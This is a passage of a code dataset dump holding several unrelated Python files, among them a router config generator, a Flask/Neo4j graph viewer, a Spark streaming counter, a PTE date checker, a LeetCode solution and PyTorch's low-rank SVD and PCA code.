Enter 'y' to confirm overwrite (will invalidate any diagrams): \".format(example_num)\n ).strip().lower()\n if confirm != \"y\":\n exit()\n\n# Build the edges dictionary, mapping edges (immutable pairs of router ids) to costs (randomly generated), and\n# build the connections dictionary, mapping router ids to the set of routers they are connected to.\nedge_costs = {}\nconnections = {str(i): set() for i in router_ids}\nfor line in undir_adj_list.strip().splitlines():\n line = line.strip()\n parts = line.split(\":\")\n router = parts[0]\n\n full_neighbours = set(parts[1].split(\",\"))\n for neighbour in full_neighbours:\n cost_parts = neighbour.split('w')\n neighbour = cost_parts[0]\n if len(cost_parts) > 1:\n edge_costs[Edge(router, neighbour)] = int(cost_parts[1])\n else:\n edge_costs[Edge(router, neighbour)] = random.choice(costs)\n\n neighbours = set([part.split('w')[0] for part in parts[1].split(\",\")])\n\n connections[router] |= neighbours\n for neighbour in neighbours:\n connections[neighbour] |= {router}\n\n# Build the Graph object.\ngraph = dijkstras.Graph()\nfor router_id in connections:\n graph.add_node(router_id)\nfor edge, cost in edge_costs.items():\n graph.add_edge(*edge, distance=cost)\n\n# Initialise both output matrices.\nnum_routers = len(connections.keys())\nnum_edges = len(edge_costs.keys())\nadjacency_matrix = [[0 for i in range(num_routers)] for j in range(num_routers)]\nincidence_matrix = [[0 for k in range(num_edges)] for l in range(num_routers)]\n\n# Build both output matrices.\nfor edge_num, ((node_1, node_2), cost) in enumerate(edge_costs.items()):\n adjacency_matrix[int(node_1) - 1][int(node_2) - 1] = cost\n adjacency_matrix[int(node_2) - 1][int(node_1) - 1] = cost\n\n incidence_matrix[int(node_1) - 1][edge_num] = cost\n incidence_matrix[int(node_2) - 1][edge_num] = cost\n\n# Cross check matrices validity\npassed = True\nfor column in zip(*incidence_matrix):\n cost = max(column)\n node_1, node_2 = [index + 1 for index, cost in enumerate(column) if cost != 0]\n\n passed = adjacency_matrix[int(node_1) - 1][int(node_2) - 1] == cost if passed else False\n passed = adjacency_matrix[int(node_2) - 1][int(node_1) - 1] == cost if passed else False\ncount = 0\nfor index_1, row in enumerate(adjacency_matrix):\n for index_2, cost in enumerate(row):\n column = [0 for _ in range(num_routers)]\n router_id_1 = index_1 + 1\n column[index_1] = cost\n column[index_2] = cost\n if any(column):\n passed = column in [list(tuple_column) for tuple_column in zip(*incidence_matrix)] if passed else False\n count += 1\npassed = count / 2 == num_edges if passed else False\nif not passed:\n print(\"Sorry! 
Matrices malformed.\")\n exit()\n\n# Build config files needed for router operation.\n\n\ndef pad_zero(str_num):\n if len(str_num) == 2:\n return str_num\n elif len(str_num) == 1:\n return \"0\" + str_num\n\nfor router in connections:\n config = \"router-id \" + router + \"\\n\"\n config += \"input-ports \"\n for neighbour in connections[router]:\n config += \"5\" + pad_zero(router) + pad_zero(neighbour) + \", \"\n config = config[:-2]\n config += \"\\noutputs \"\n for neighbour in connections[router]:\n cost = edge_costs[Edge(router, neighbour)]\n config += \"5\" + pad_zero(neighbour) + pad_zero(router) + \"/\" + str(cost) + \"/\" + neighbour + \", \"\n config = config[:-2]\n config += \"\\nupdate-period \" + update_period\n config_filename = \"example-\" + example_num + \"-config-\" + router + \".txt\"\n os.makedirs(os.path.dirname(config_path), exist_ok=True)\n with open(config_path + config_filename, \"w+\") as config_file:\n config_file.write(config)\n\n# Build expected converged routing table files\nfor router_id in router_ids:\n router_id = str(router_id)\n converged_routing_table = \"{\\n\"\n for target_router_id in router_ids:\n target_router_id = str(target_router_id)\n if router_id == target_router_id:\n continue\n try:\n cost, path = dijkstras.shortest_path(graph, router_id, target_router_id)\n if cost >= 16:\n print(\"WARNING! A minimum cost path of {} was found (16 or higher).\".format(cost))\n input(\"Enter anything to continue...\")\n first_hop = path[1] # path[0] is router_id itself.\n converged_routing_table += '\\t\"{}\": {{\\n'.format(target_router_id)\n converged_routing_table += '\\t\\t\"{}\": {},\\n'.format(RouteInfos.FIRST_HOP, first_hop)\n converged_routing_table += '\\t\\t\"{}\": {}\\n'.format(RouteInfos.COST, cost)\n converged_routing_table += \"\\t},\\n\"\n except KeyError:\n print(\"Could not create a path between two nodes of the graph. This probably means the graph described \"\n \"by your adjacency list is disjoint\")\n exit(1)\n converged_routing_table = converged_routing_table[0:-2]\n converged_routing_table += \"\\n}\"\n expected_dir_path = config_path + \"converged-routing-tables/\"\n os.makedirs(os.path.dirname(expected_dir_path), exist_ok=True)\n with open(expected_dir_path + \"routing-table-\" + router_id + \".json\", \"w+\") as expected_file:\n expected_file.write(converged_routing_table)\n\n# Print results.\nprint(\"\\nConfig files successfully created for example network\", example_num + \".\\n\")\nprint(\"VISUALISE USING THIS ONLINE TOOL: http://graphonline.ru/en/\")\nprint(\"\\nADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n print(\",\".join(map(str, line)))\nprint(\"\\nNO COST ADJACENCY MATRIX:\")\nfor line in adjacency_matrix:\n line = [1 if i != 0 else 0 for i in line]\n print(\",\".join(map(str, line)))\nprint(\"\\nINCIDENCE MATRIX:\")\nfor line in incidence_matrix:\n print(\",\".join(map(str, line)))\n","sub_path":"scripts/example_config_generator.py","file_name":"example_config_generator.py","file_ext":"py","file_size_in_byte":8201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
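The `Edge` class in the record above makes an undirected edge hashable and order-insensitive, which is what lets `edge_costs` store one entry per link. A two-line check of that behavior, outside the script:

```python
# Edge("1", "2") and Edge("2", "1") are the same frozenset, so an
# undirected cost table needs only one entry per link.
class Edge(frozenset):
    def __new__(cls, *args):
        return super().__new__(cls, args)

costs = {Edge("1", "2"): 5}
print(costs[Edge("2", "1")])  # 5
```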
+{"seq_id":"319231862","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.macosx-10.6-intel/egg/ndg/xacml/parsers/etree/actionreader.py\n# Compiled at: 2011-02-11 08:34:11\n\"\"\"NDG XACML ElementTree based parser for Action type\n\nNERC DataGrid\n\"\"\"\n__author__ = 'P J Kershaw'\n__date__ = '16/03/10'\n__copyright__ = '(C) 2010 Science and Technology Facilities Council'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__license__ = 'BSD - see LICENSE file in top-level directory'\n__contact__ = 'Philip.Kershaw@stfc.ac.uk'\n__revision__ = '$Id: actionreader.py 7109 2010-06-28 12:54:57Z pjkersha $'\nfrom ndg.xacml.core.action import Action\nfrom ndg.xacml.parsers.etree.targetchildreader import TargetChildReader\n\nclass ActionReader(TargetChildReader):\n \"\"\"ElementTree based parser for Action type\n @cvar TYPE: XACML type to instantiate from parsed object\n @type TYPE: type\n \"\"\"\n TYPE = Action","sub_path":"pycfiles/ndg_xacml-0.5.1-py2.7/actionreader.py","file_name":"actionreader.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"29781321","text":"import mock\n\nfrom mopidy.utils import locale_decode\n\nfrom tests import unittest\n\n\n@mock.patch('mopidy.utils.locale.getpreferredencoding')\nclass LocaleDecodeTest(unittest.TestCase):\n def test_can_decode_utf8_strings_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n result = locale_decode(\n '[Errno 98] Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_can_decode_an_ioerror_with_french_content(self, mock):\n mock.return_value = 'UTF-8'\n\n error = IOError(98, 'Adresse d\\xc3\\xa9j\\xc3\\xa0 utilis\\xc3\\xa9e')\n result = locale_decode(error)\n\n self.assertEquals(u'[Errno 98] Adresse d\\xe9j\\xe0 utilis\\xe9e', result)\n\n def test_does_not_use_locale_to_decode_unicode_strings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode(u'abc')\n\n self.assertFalse(mock.called)\n\n def test_does_not_use_locale_to_decode_ascii_bytestrings(self, mock):\n mock.return_value = 'UTF-8'\n\n locale_decode('abc')\n\n self.assertFalse(mock.called)\n","sub_path":"tests/utils/decode_test.py","file_name":"decode_test.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"617960780","text":"class Instance(object):\n def __init__(self, obj):\n self.id = obj.id\n self.tags = obj.tags\n self.size = obj.instance_type\n self.launch_time = obj.launch_time\n self._placement = obj.placement\n self._state = obj.state\n self._os = guess_os(obj)\n self._reserved = False\n self._prices = {\n 'current': 0.0,\n 'best': 0.0,\n }\n\n @property\n def current(self):\n return self._prices['current']\n\n @current.setter\n def current(self, value):\n self._prices['current'] = value\n\n @property\n def best(self):\n return self._prices['best']\n\n @best.setter\n def best(self, value):\n self._prices['best'] = value\n\n @property\n def reserved(self):\n if self._reserved:\n return 'Yes'\n else:\n return 'No'\n\n @reserved.setter\n def reserved(self, value):\n if value == 'Yes':\n self._reserved = True\n elif value == 'No':\n self._reserved = False\n else:\n raise ValueError\n\n @property\n def name(self):\n names = [tag for tag in self.tags if tag['Key'] == 'Name']\n if names is None:\n return ''\n else:\n return names[0]['Value']\n\n @property\n def availability_zone(self):\n return self._placement['AvailabilityZone']\n\n @property\n def region(self):\n return self._placement['AvailabilityZone'][:-1]\n\n @property\n def key(self):\n return self._os[1]\n\n @property\n def operating_system(self):\n return self._os[0]\n\n @property\n def state(self):\n return self._state['Name']\n\n def match_reserved_instance(self, reserved):\n if any((self.state != 'running',\n reserved['State'] != 'active',\n reserved['InstancesLeft'] == 0,\n reserved['ProductDescription'] != self.operating_system,\n reserved['InstanceType'] != self.size,\n reserved['AvailabilityZone'] != self.availability_zone)):\n return False\n return True\n\n\ndef guess_os(instance):\n console_output = instance.console_output()['Output']\n if 'Windows' in console_output:\n return ('Windows', 'win')\n else:\n if 'RHEL' in console_output:\n return ('Red Hat Enterprise Linux', 'rhel')\n elif 'SUSE' in console_output:\n return ('SUSE Linux', 'suse')\n else:\n return ('Linux/UNIX', 'linux')\n","sub_path":"accloudtant/aws/instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"398577405","text":"# coding=utf-8\nfrom flask import Flask, jsonify, render_template\nfrom neo4j import GraphDatabase\nfrom flask import request\nfrom py2neo import Graph,Node,Relationship\n\ndriver = GraphDatabase.driver(\"bolt://localhost:7687\", auth=(\"neo4j\",\"neo4j\")) #认证连接数据库\n\napp = Flask(__name__) #flask框架必备\ngraph = Graph()\n\n\ndef buildNodes(nodeRecord):\n data = {\"id\": str(nodeRecord.n._id), \"label\": next(iter(nodeRecord.n.labels))}\n data.update(nodeRecord.n.properties)\n\n return {\"data\": data}\n\ndef buildEdges(relationRecord):\n data = {\"source\": str(relationRecord.r.start_node.properties['id']),\n \"target\": str(relationRecord.r.end_node.properties['id']),\n \"relationship\": relationRecord.r.rel.type}\n\n return {\"data\": data}\n\n\n@app.route('/')#建立路由,指向网页\ndef index():\n return render_template('search.html')\n\n\n@app.route('/searchGraph')\ndef searchGraph():\n node = request.args.get('wd')\n print(node)\n with open(\"node.txt\", \"w\") as f:\n f.write(node)\n return render_template('index.html', node=node)\n\n#Laurence\n@app.route('/graph')#两个路由指向同一个网页,返回图的节点和边的结构体\ndef get_graph():\n # nodes = list(map(buildNodes, graph.run('MATCH (n) RETURN n').data()))\n #\n # edges = list(map(buildEdges, graph.run('MATCH ()-[r]->() RETURN r').data()))\n # # elements = {\"nodes\": nodes, \"edges\": edges}\n\n with open(\"node.txt\", \"r\", encoding='utf-8') as f:\n line = f.readlines()\n line = line[0].strip()\n print(\"1.{}\".format(line))\n #\n # with driver.session() as session:\n # # strAll = 'MATCH (p1{name:\"Laurence Fishburne\"})-[r1:ACTED_IN]->(m)<-[r2:DIRECTED]-(p2) RETURN p1,m,p2,r1,r2'\n # #\n # # print(strAll)\n # # results=session.run(strAll).values()\n # # nodeList=[]\n # # edgeList=[]\n # # for result in results:\n # # nodeList.append(result[0])\n # # nodeList.append(result[1])\n # # nodeList.append(result[2])\n # # nodeList=list(set(nodeList))\n # # edgeList.append(result[3])\n # # edgeList.append(result[4])\n # #\n # # nodes = list(map(buildNodes, nodeList))\n # # edges = list(map(buildEdges,edgeList))\n #\n # strNode = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN n,p,r LIMIT 25\"\n # # strNode = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN n,p LIMIT 25\"\n # print(strNode)\n # # nodes = list(map(buildNodes,graph.run(strNode).data()))\n #\n # nodes = []\n # for node in graph.run(strNode).data():\n # nodeResult = buildNodes(node)\n # nodes.append(nodeResult)\n #\n # strEdge = \"MATCH (n{name: 'Laurence Fishburne'})-[r]-(p) RETURN r LIMIT 25\"\n # # strEdge = \"MATCH (n:Movie{title: '\" + line + \"'})-[r]-(p) RETURN r LIMIT 25\"\n # print(strEdge)\n #\n # # edges= list(map(buildEdges,graph.run(strEdge).data()))\n # edges = []\n # for edge in graph.run(strEdge).data():\n # edgeResult = buildEdges(edge)\n # edges.append(edgeResult)\n\n nodes = list(map(buildNodes, graph.cypher.execute('MATCH (n) RETURN n')))\n edges = list(map(buildEdges, graph.cypher.execute('MATCH ()-[r]->() RETURN r')))\n\n return jsonify(elements = {\"nodes\": nodes, \"edges\": edges})\n\nif __name__ == '__main__':\n app.run(debug = True) #flask框架必备","sub_path":"front/neo4j-web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"171906493","text":"import sys\n\nfrom pyspark import SparkContext # allow us to work with spark\nfrom pyspark.streaming import StreamingContext # allow to work with streams in spark\n\nif __name__ == \"__main__\":\n sc = SparkContext(\"local[2]\", \"StreamingCount\")\n sc.setLogLevel(\"WARN\")\n\n ssc = StreamingContext(sc, 2) # 2 is a batchInterval prop of the DStream created by this StreamingContext\n\n ssc.checkpoint('file:///tmp/spark')\n\n lines = ssc.socketTextStream(sys.argv[1], int(sys.argv[2])) # hostname and port\n\n counts = lines.flatMap(lambda line: line.split(\" \"))\\\n .filter(lambda word: \"ERROR\" in word)\\\n .map(lambda word: (word, 1))\\\n .reduceByKeyAndWindow(lambda a, b: a + b, lambda a, b: a - b, 20, 2)\n\n counts.pprint()\n\n ssc.start()\n ssc.awaitTermination()\n\n# ncat -lk 9999\n# spark-submit .\\reduce_by_key_and_window.py localhost 9999\n","sub_path":"reduce_by_key_and_window.py","file_name":"reduce_by_key_and_window.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"534256401","text":"# -*- coding: utf-8 -*-\n# Created by Daniel Liu on 2017/7/25\nimport datetime\nimport time\nimport traceback\n\nfrom Browser import Browser\nfrom Config import Config\nfrom MailAgent import MailAgent\nfrom lib.Log import Log\n\nreportedDates = {'RMIT': [], 'PEARSON': [], 'CLIFTON': []}\n\n\ndef compareDate(reported, result):\n return reported[\"year\"] == result[\"year\"] and \\\n reported[\"month\"] == result[\"month\"] and \\\n reported[\"day\"] == result[\"day\"]\n\n\ndef processRetrievedData(data, config, log):\n message = \"Available Dates: \\n\"\n needReport = False\n for testCenter in [\"RMIT\", \"PEARSON\", \"CLIFTON\"]:\n # First remove disappeared dates\n for reportedDate in reportedDates[testCenter]:\n needRemove = True\n for result in data[testCenter]:\n if compareDate(reportedDate, result):\n needRemove = False\n if needRemove:\n reportedDates[testCenter].remove(reportedDate)\n # Then determine whether there are dates that needs to be reported\n tomorrow = datetime.date.today() + datetime.timedelta(1)\n for result in data[testCenter]:\n if config.isOnlyReportSpecificMonth() and result['month'] != config.getSpecificMonth():\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if config.isOnlyReportCurrentMonth() and result[\"month\"] != tomorrow.month:\n log.info('Not Desired Date: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n if (not config.isReportWithin24HoursAppointments()) and result['day'] == tomorrow.day + 1:\n log.info('Within 24 Hours: {0}: {1}-{2}-{3}'.format(\n testCenter, result[\"year\"], result[\"month\"], result[\"day\"]))\n continue\n message += \"{0}: {1}-{2}-{3} \\n\".format(testCenter, result[\"year\"], result[\"month\"], result[\"day\"])\n if len(reportedDates[testCenter]) == 0:\n reportedDates[testCenter].append(result)\n needReport = True\n for reportedDate in reportedDates[testCenter]:\n if compareDate(reportedDate, result):\n continue\n else:\n reportedDates[testCenter].append(result)\n needReport = True\n return message, needReport\n\ndef main():\n logger = Log(\"PTE-ACC\", \"PTEChecker.log\", \"Logs\")\n config = Config(\"PTEChecker.conf\", logger)\n while True:\n try:\n mailAgent = MailAgent(config, logger)\n browser = Browser(config, logger)\n data = browser.startRetrieveData()\n message, needReport = processRetrievedData(data, config, logger)\n if needReport:\n mailAgent.sendEmail(message)\n logger.debug('Message has been sent.')\n if not needReport:\n logger.info('No desired dates.')\n logger.info('Routine check finished.')\n time.sleep(config.getScanIntervals())\n\n except Exception as e:\n logger.error('Error occurred: {0}'.format(e))\n logger.error(traceback.format_exc())\n continue\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"267164924","text":"from .shape import ShapeStructs as ss\r\nfrom .piece import Piece\r\n\r\nclass Player:\r\n\r\n def __init__(self, color, pieceSet):\r\n self.color = color\r\n self.pieceSet = []\r\n for pieceInstructions in pieceSet:\r\n self.pieceSet.append(pieceInstructions)\r\n\r\n def removePiece(self, piece):\r\n for pieceObj in self.pieceSet:\r\n if pieceObj.id == piece.id:\r\n self.pieceSet.remove(pieceObj)\r\n\r\n def piecesAsString(self):\r\n toReturn = ''\r\n divider = ''\r\n for piece in self.pieceSet:\r\n toReturn += divider\r\n toReturn += piece.id\r\n divider = ','\r\n return toReturn\r\n\r\n def validatePlayerHasPiece(self, piece):\r\n playerHasPlayedPiece = True\r\n for myPiece in self.pieceSet:\r\n if piece.id == myPiece.id:\r\n playerHasPlayedPiece = False\r\n\r\n if playerHasPlayedPiece:\r\n raise PieceHasBeenPlacedError(\"This piece has been placed\")\r\n\r\nclass Error(Exception):\r\n pass\r\n\r\nclass PieceHasBeenPlacedError(Error):\r\n def __init__(self, message):\r\n self.message = message","sub_path":"backup/blockoo/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"542137854","text":"#!/usr/bin/python\n\nfilerow = []\nrowline = []\ncrimefile = open(\"tahoe-r.txt\", 'r')\nfor line in crimefile.readlines():\n\tline = line.strip()\n\trowline = line.split(\" \")\t\n\tfilerow.append(rowline)\nfilerwo_len = len(filerow)\n\nfilerow2 = []\nrowline2 = []\n\nfor i in range(len(filerow)):\n\trowline2 = []\n\tif( i > 9):\n\t\trowline2.append(filerow[i][1])\n\t\tduration = (80000/(float(filerow[i][1]) -float(filerow[i - 10][1])))\n\t\trowline2.append(duration)\n\t\tfilerow2.append(rowline2)\n\noutput = open(\"tahoe-thr.txt\", 'w')\n\nstring =\"\"\nfor item in filerow2:\n\tstring = str(item[0]) +\" \" + str(item[1]) \t\n\toutput.write(\"%s\\n\" % string)\n\nprint (filerow)\n","sub_path":"CS-252-ComputerNetworksLab/11/tahoe-thr.py","file_name":"tahoe-thr.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"652604716","text":"\"\"\"\nGiven an array of integers, find out whether there are two distinct indices i and j in the array such that the absolute difference between nums[i] and nums[j] is at most t and the absolute difference between i and j is at most k.\n\nExample 1:\n Input: nums = [1,2,3,1], k = 3, t = 0\n Output: true\n\nExample 2:\n Input: nums = [1,0,1,1], k = 1, t = 2\n Output: true\n\nExample 3:\n Input: nums = [1,5,9,1,5,9], k = 2, t = 3\n Output: false\n\"\"\"\n\n\n# too slow\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n print(unique_nums)\n\n for unique_num in unique_nums:\n print(unique_num)\n\n for new_unique_num in unique_nums:\n if abs(new_unique_num - unique_num) <= t:\n\n if new_unique_num == unique_num:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n for j in range(i + 1, len(unique_nums[unique_num])):\n if unique_nums[unique_num][j] - unique_nums[unique_num][i] <= k:\n return True\n else:\n print(\"num2:\" + str(new_unique_num))\n for i in range(0, len(unique_nums[unique_num])):\n print(\"i: \"+str(i))\n for j in range(0, len(unique_nums[new_unique_num])):\n print(\"j: \" + str(j))\n if abs(unique_nums[unique_num][i] - unique_nums[new_unique_num][j]) <= k:\n return True\n return False\n\"\"\"\ndef containsNearbyAlmostDuplicate(nums, k, t):\n # store the nums and their position into a dict\n unique_nums = dict()\n for i in range(0, len(nums)):\n if nums[i] not in unique_nums:\n unique_nums[nums[i]] = [i]\n else:\n unique_nums[nums[i]].append(i)\n\n print(unique_nums)\n # sort the keys of the dict\n sorted_keys = sorted(unique_nums)\n # the number of distinct keys\n num_of_unique = len(sorted_keys)\n print(sorted_keys)\n\n # iterate through the sorted keys to find out the result\n for i in range(0, num_of_unique):\n i_list = unique_nums[sorted_keys[i]]\n print(i_list)\n for j in range(i, num_of_unique):\n # check if the difference of two keys is at most t\n if sorted_keys[j] - sorted_keys[i] <= t:\n print(sorted_keys[j] - sorted_keys[i])\n # check if there are two indexs which have a difference at most k\n if i == j:\n for index in range(0, len(i_list)-1):\n if i_list[index + 1] - i_list[index] <= k:\n return True\n else:\n for index_i in i_list:\n for index_j in unique_nums[sorted_keys[j]]:\n if abs(index_i - index_j) <= k:\n return True\n else:\n # break the loop\n break\n return False\n\n\ninput1 = [1,2,3,1]\nk1 = 3\nt1 = 0\n\ninput2 = [1,0,1,1]\nk2 = 1\nt2 = 2\n\ninput3 = [1,5,9,1,5,9]\nk3 = 2\nt3 = 3\n\ninput4 = [10,100,11,9,100,10]\nk4 = 1\nt4 = 2\n\nprint(containsNearbyAlmostDuplicate(input3, k3, t3))\n\n","sub_path":"LeetCode-Python/220 Contains Duplicate III.py","file_name":"220 Contains Duplicate III.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"264528712","text":"\"\"\"Implement various linear algebra algorithms for low rank matrices.\n\"\"\"\n\n__all__ = ['svd_lowrank', 'pca_lowrank']\n\nfrom typing import Tuple, Optional\n\nimport torch\nfrom torch import Tensor\nfrom . import _linalg_utils as _utils\nfrom ._overrides import has_torch_function, handle_torch_function\n\n\ndef get_approximate_basis(A, # type: Tensor\n q, # type: int\n niter=2, # type: Optional[int]\n M=None # type: Optional[Tensor]\n ):\n # type: (...) -> Tensor\n \"\"\"Return tensor :math:`Q` with :math:`q` orthonormal columns such\n that :math:`Q Q^H A` approximates :math:`A`. If :math:`M` is\n specified, then :math:`Q` is such that :math:`Q Q^H (A - M)`\n approximates :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 4.4 from\n Halko et al, 2009.\n\n .. note:: For an adequate approximation of a k-rank matrix\n :math:`A`, where k is not known in advance but could be\n estimated, the number of :math:`Q` columns, q, can be\n choosen according to the following criteria: in general,\n :math:`k <= q <= min(2*k, m, n)`. For large low-rank\n matrices, take :math:`q = k + 5..10`. If k is\n relatively small compared to :math:`min(m, n)`, choosing\n :math:`q = k + 0..2` may be sufficient.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int): the dimension of subspace spanned by :math:`Q`\n columns.\n\n niter (int, optional): the number of subspace iterations to\n conduct; ``niter`` must be a\n nonnegative integer. In most cases, the\n default value 2 is more than enough.\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n \"\"\"\n\n niter = 2 if niter is None else niter\n m, n = A.shape[-2:]\n dtype = _utils.get_floating_dtype(A)\n matmul = _utils.matmul\n\n R = torch.randn(n, q, dtype=dtype, device=A.device)\n\n A_H = _utils.transjugate(A)\n if M is None:\n (Q, _) = matmul(A, R).qr()\n for i in range(niter):\n (Q, _) = matmul(A_H, Q).qr()\n (Q, _) = matmul(A, Q).qr()\n else:\n M_H = _utils.transjugate(M)\n (Q, _) = (matmul(A, R) - matmul(M, R)).qr()\n for i in range(niter):\n (Q, _) = (matmul(A_H, Q) - matmul(M_H, Q)).qr()\n (Q, _) = (matmul(A, Q) - matmul(M, Q)).qr()\n\n return Q\n\n\ndef svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Return the singular value decomposition ``(U, S, V)`` of a matrix,\n batches of matrices, or a sparse matrix :math:`A` such that\n :math:`A \\approx U diag(S) V^T`. In case :math:`M` is given, then\n SVD is computed for the matrix :math:`A - M`.\n\n .. note:: The implementation is based on the Algorithm 5.1 from\n Halko et al, 2009.\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n .. note:: The input is assumed to be a low-rank matrix.\n\n .. note:: In general, use the full-rank SVD implementation\n ``torch.svd`` for dense matrices due to its 10-fold\n higher performance characteristics. 
The low-rank SVD\n will be useful for huge sparse matrices that\n ``torch.svd`` cannot handle.\n\n Arguments::\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of A.\n\n niter (int, optional): the number of subspace iterations to\n conduct; niter must be a nonnegative\n integer, and defaults to 2\n\n M (Tensor, optional): the input tensor's mean of size\n :math:`(*, 1, n)`.\n\n References::\n - Nathan Halko, Per-Gunnar Martinsson, and Joel Tropp, Finding\n structure with randomness: probabilistic algorithms for\n constructing approximate matrix decompositions,\n arXiv:0909.4061 [math.NA; math.PR], 2009 (available at\n `arXiv `_).\n\n \"\"\"\n if not torch.jit.is_scripting():\n tensor_ops = (A, M)\n if (not set(map(type, tensor_ops)).issubset((torch.Tensor, type(None))) and has_torch_function(tensor_ops)):\n return handle_torch_function(svd_lowrank, tensor_ops, A, q=q, niter=niter, M=M)\n return _svd_lowrank(A, q=q, niter=niter, M=M)\n\n\ndef _svd_lowrank(A, q=6, niter=2, M=None):\n # type: (Tensor, Optional[int], Optional[int], Optional[Tensor]) -> Tuple[Tensor, Tensor, Tensor]\n q = 6 if q is None else q\n m, n = A.shape[-2:]\n matmul = _utils.matmul\n if M is None:\n M_t = None\n else:\n M_t = _utils.transpose(M)\n A_t = _utils.transpose(A)\n\n # Algorithm 5.1 in Halko et al 2009, slightly modified to reduce\n # the number conjugate and transpose operations\n if m < n:\n # computing the SVD approximation of a transpose in order to\n # keep B shape minimal\n Q = get_approximate_basis(A_t, q, niter=niter, M=M_t)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B_t = matmul(A, Q_c)\n else:\n B_t = matmul(A, Q_c) - matmul(M, Q_c)\n U, S, V = torch.svd(B_t)\n V = Q.matmul(V)\n else:\n Q = get_approximate_basis(A, q, niter=niter, M=M)\n Q_c = _utils.conjugate(Q)\n if M is None:\n B = matmul(A_t, Q_c)\n else:\n B = matmul(A_t, Q_c) - matmul(M_t, Q_c)\n U, S, V = torch.svd(_utils.transpose(B))\n U = Q.matmul(U)\n\n return U, S, V\n\n\ndef pca_lowrank(A, q=None, center=True, niter=2):\n # type: (Tensor, Optional[int], bool, int) -> Tuple[Tensor, Tensor, Tensor]\n r\"\"\"Performs linear Principal Component Analysis (PCA) on a low-rank\n matrix, batches of such matrices, or sparse matrix.\n\n This function returns a namedtuple ``(U, S, V)`` which is the\n nearly optimal approximation of a singular value decomposition of\n a centered matrix :math:`A` such that :math:`A = U diag(S) V^T`.\n\n .. note:: The relation of ``(U, S, V)`` to PCA is as follows:\n\n - :math:`A` is a data matrix with ``m`` samples and\n ``n`` features\n\n - the :math:`V` columns represent the principal directions\n\n - :math:`S ** 2 / (m - 1)` contains the eigenvalues of\n :math:`A^T A / (m - 1)` which is the covariance of\n ``A`` when ``center=True`` is provided.\n\n - ``matmul(A, V[:, :k])`` projects data to the first k\n principal components\n\n .. note:: Different from the standard SVD, the size of returned\n matrices depend on the specified rank and q\n values as follows:\n\n - :math:`U` is m x q matrix\n\n - :math:`S` is q-vector\n\n - :math:`V` is n x q matrix\n\n .. note:: To obtain repeatable results, reset the seed for the\n pseudorandom number generator\n\n Arguments:\n\n A (Tensor): the input tensor of size :math:`(*, m, n)`\n\n q (int, optional): a slightly overestimated rank of\n :math:`A`. 
